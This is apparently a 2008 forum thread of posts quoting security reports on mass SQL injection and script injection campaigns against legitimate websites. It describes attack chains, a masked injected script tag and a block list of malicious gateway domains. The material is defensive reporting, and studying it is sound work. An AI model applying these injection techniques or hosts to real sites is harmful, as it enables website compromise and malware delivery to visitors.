FYI...

- http://preview.tinyurl.com/6mgej5
July 16, 2008 - "...According to the latest ScanSafe Global Threat Report:
1. Malware Increases 278 Percent: Web-based malware increased 278 percent as more and more legitimate sites including Wal-Mart, Business Week, Ralph Lauren Home and Race for Life were compromised. This widespread compromise of legitimate websites was largely the result of automated attack tools which became freely availably in the last months of 2007.
2. SQL Injection Attacks Outpace Other Attacks by 212 Percent: SQL injection attacks, an exploit in which the attacker adds Structured Query Language (SQL) code to a Web form input box to gain access to resources or make changes to data, have rapidly become the most common form of website compromise, outpacing all other types of compromise by 212 percent. In June, SQL injection attacks accounted for 76 percent of all compromised sites.
3. Password Stealers and Backdoor Trojans Most Commonly Blocked Malware—Putting Corporate Data at Risk: Most of the compromises attempt to install password stealers and backdoor Trojans. This category of malware increased from 4 percent of malware in January to 27 percent in June.

The ScanSafe Global Threat Report is a study of the more than 60 billion Web requests it scanned and 600 million Web threats it blocked from January through June 2008 on behalf of corporate customers in more than 60 countries across five continents. It represents the world’s largest security analysis of real-world corporate Web traffic. A full copy of the report is available at http://www.scansafe.com/resources/global_threat_reports2/ ."

//

FYI...

SQL Injection List - Format Update
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080718
18 July 2008 - "Due to popular demand, the SQL Injection list maintained at
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514 can be fetched in text form at
http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Unfortunately this means the original web page will change somewhat, and I apologize for this. However, this will be better in the long run."

//

FYI...

- http://isc.sans.org/diary.html?storyid=4771
Last Updated: 2008-07-24 07:47:29 UTC - "...it appears that the attackers expanded their target list of applications so they try to attack Cold Fusion applications now as well (previously they tried to attack ASP scripts only). If you are running Cold Fusion applications, this should be a wake-up call for you – make sure that you are not vulnerable to SQL injection. If I remember correctly, Cold Fusion does have some built-in protection against SQL injection attacks but there are clearly cases when that does not work (otherwise the attackers would not be attacking it)... It's actually a very common way that is used by hackers when they are exploiting blind SQL injection attacks. The idea is to create a condition that, if satisfied, will delay the execution of the script for a certain time period. So, the attacker watches the response time and if it was delayed, he knows that the SQL command was executed successfully. Here we're not talking about the blind SQL injection, but just a way to check if the script is vulnerable to SQL injection in general. So, the bot issues this command and checks the response time: if the reply came immediately (or in couple of seconds, depending on the site/link speed) the site is not vulnerable. If the reply took 20 seconds then the site is vulnerable. This gives them an easy way to detect vulnerable sites and (probably) create a list of such sites that they might attack directly in the future. And the site owner will not notice anything (unless he/she is checking the logs)..."

FYI...

More SQL Injections ...
- http://isc.sans.org/diary.html?storyid=4844
Last Updated: 2008-08-08 16:40:52 UTC - "... Various types of sites seem to be hit at the moment. From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.
Next:
A user visiting the site will hit w.js which, if they are using english, will pull down new.htm. new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages, flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm. Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html ... These file contains some java script... So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc). Detection for these is poor. The IE versions 9/36 at VT (Virustotal) detect the file as malicious and for FF 10/36 detect the file as being malicious.
yahoo.htm
The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute...
Office.htm
Attempts to create activeX objects and pulls the same rondll32.exe. It looks like rondll32.exe pulls down thunder.exe and wsv.exe
ksx.htm
Attempts get the browser to include the rondll32.exe file. Detection for rondll32.exe is good with most AV products catching this one.
06014.htm
was unavailable at the time I checked.

...The people that reported them identified the attacks in their log files and IDS systems. It is good to see that people are checking their logs. Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site. This round looks like it has just started. We'll keep an eye on how this develops."

//

FYI...

Sunkist site - mass JavaScript injection
- http://securitylabs.websense.com/content/Alerts/3167.aspx
08.22.2008 - "Websense... has discovered that a Sunkist site is infected with a mass JavaScript injection that delivers a malicious payload. The reporting page on the Sunkist NewsLINK site contains malicious JavaScript code that loads malicious payloads from -nine- different hosts. Sunkist is a popular drink in the USA, Canada, UK, Australia, and other parts of the world..."

(Screenshot of the infected site available at the URL above.)

FYI...

- http://www.darkreading.com/document.asp?doc_id=162515&print=true
AUGUST 27, 2008 - "...Attackers have begun hiding the malicious code by encoding so they can keep using these old-school attacks... ScanSafe today reported* an 87 percent jump in malware blocked by its Web security service in July compared with June, 75 percent of which came from the wave of SQL injection attacks hitting Websites the past few months. ScanSafe detected 34 percent more malware last month than it did in all of 2007, according to the report..."
* http://www.scansafe.com/__data/assets/pdf_file/8696/July_2008_GTR_rev.pdf
"...ScanSafe reported a 278% increase for the first six months of the year. That alarming trend continued in July with the number of Web-based malware blocks increasing another 87% over the previous month. The majority of the increase in Web-based malware resulted from ongoing web-site compromises which represented 83% of all malware blocks for the month. 75% of all malware blocks were the result of SQL injection attacks, the majority of which were related to the Asprox fast flux botnet. The Asprox botnet is believed to have origins in Russia and has commercial interests ranging from spam and clickfraud to rogue anti-spyware software and backdoor Trojans. July 2008 also bore witness to an increase in social engineering email scams designed to install malware on victims computers. 95% of ScanSafe customers fell for the scams and attempted to clickthrough to the malicious site, which represented 1.3% of all malware blocks for the month..."

FYI...

SQL injection ...BusinessWeek.com
- http://www.sophos.com/pressoffice/news/articles/2008/09/businessweek.html
15 September 2008 - "Hundreds of webpages in a section of BusinessWeek’s website which offers information about where MBA students might find future employers have been affected. According to Sophos, hackers used an SQL injection attack - where a vulnerability is exploited in order to insert malicious code into the site's underlying database - to pepper pages with code that tries to download malware from a Russian web server..."

(Video available at the URL above.)

FYI...

SQL threat: All Your (Data)base Are Belong to Trojan.Eskiuel...
- http://preview.tinyurl.com/45qhsy
09-17-2008 (Symantec Security Response Blog) - "...Our honeypot servers are full of plenty of worms that spread by email, IM, file-sharing, or network vulnerabilities, so finding a Trojan that targets SQL databases is always an unusual surprise for a virus researcher... new SQL threat: Trojan.Eskiuel*. The main functionality of this threat is to scan the Internet to find machines with poorly configured SQL servers (i.e. with weak or non-existing passwords), gain access to them, and use their stored procedures in order to download new malware from a remote host. The anatomy of the attack is pretty simple. When run, the threat will read the IP address passed as an input parameter in the command line, and will start scanning all of the class B subnet of that IP address, looking for an SQL server... Once an SQL server is located, the Trojan will run a bruteforce attack on some common weak passwords for the administrator "sa" account. Note that the threat does not try to exploit any vulnerability, it is only trying to take advantage of SQL servers that may not be properly configured. When a weak password is found, the Trojan will log into the SQL server with full administrator rights... Machines with a badly configured SQL server are exposed to this threat, which can attack the servers both locally or remotely. Standard good security practices are advised to tackle this risk: set a strong password for the SQL server administrator account, block access to the server from unrequired networks, and properly configure access rights for the stored procedures."
* http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-091215-0809-99

(Screenshots and more detail available at both URL links above.)

FYI...

ASPROX mutant
- http://isc.sans.org/diary.html?storyid=5092
Last Updated: 2008-09-29 10:22:25 UTC - "...ongoing SQL injections... The injection itself (starting with DECLARE...) looks a lot like the technique used by ASPROX (see our earlier diary*), but that the injection attempt here is made not via the URL but rather via a cookie is a new twist... in the end delivers a file called "x.exe" that looks like yet another password stealer, but has poor detection at this time (Virustotal**)..."
* http://isc.sans.org/diary.html?storyid=4565

** http://www.virustotal.com/en/analisis/5584aa5aed6d2338141d7ae62c126fff

FYI...

Adobe site - SQL injected...
- http://www.sophos.com/security/blog/2008/10/1863.html
16 October 2008 - "At the end of last week SophosLabs discovered that Adobe’s website was linking to a site infected with Mal/Badsrc-C. The infection had been encountered by a business partner of ours... Digging deeper, we discovered that the infected site was actually now part of the Adobe empire following an acquisition in October 2006. Some of the infected webpages have subsequently been rebranded but the underlying databases serving the site are still riddled with infections... The threat from web-based malware is increasing by the day and the fact the it can happen to companies as large as Adobe should make all web admins sit up and take notice.
NOTE/update: Last night Adobe contacted us and indicated that the issue had been resolved. I can confirm that the issue has been resolved."
- http://www.theregister.co.uk/2008/10/16/hijacked_abobe_page/

(Screenshot available at both URLs above.)

FYI...

ECPAT NZ INC Courtesy Site: Mass Injection
- http://securitylabs.websense.com/content/Alerts/3227.aspx
11.04.2008 - "Websense... has discovered that an ECPAT NZ INC courtesy site is infected with a mass JavaScript injection that delivers a malicious payload. Multiple pages on the site have been mass injected attempting to deliver malicious payloads from 20 different hosts. ECPAT is a global network of organizations and individuals working together for the elimination of child prostitution, child pornography, and the trafficking of children for sexual purposes. ECPAT NZ plays a key role in liaising and bringing about cooperation between key government and sector groups involved in the areas of commercial sexual exploitation of children (CSEC). In an effort to protect their visitors, Websense Security Labs is working closely with ECPAT NZ INC to advise on the threats on their Web site. The ThreatSeeker Network has been tracking how such attacks prevail over reputed and significant Web sites, targeting their peers and other visitors..."

(Screenshots available at the URL above.)

FYI...

- http://www.viruslist.com/en/weblog?weblogid=208187604
November 07, 2008 | 16:31 GMT - "...onset of the latest mass hack attack – websites being hacked and links placed on them that lead to malicious servers. We’re estimating that in the last two days alone, between 2000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this... We’re still working on determining exactly how the sites were hacked, but there are two scenarios which are the most likely – using SQL injection or using accounts to the sites which had already been stolen. One common factor is that the majority of the hacked sites run on some type of ASP engine... The attackers add a tag, <script src=http://******/h.js>, to the html of hacked sites. The link leads to Java Script located on one of six servers – these servers act as gateways for further redirecting of requests. We’ve identified six of these gateways and they’ve been added to the blacklist in our antivirus:
* armsart.com
* acglgoa.com
* idea21.org
* yrwap.cn
* s4d.in
* dbios.org
If you’re an admin, you should block access to these sites..."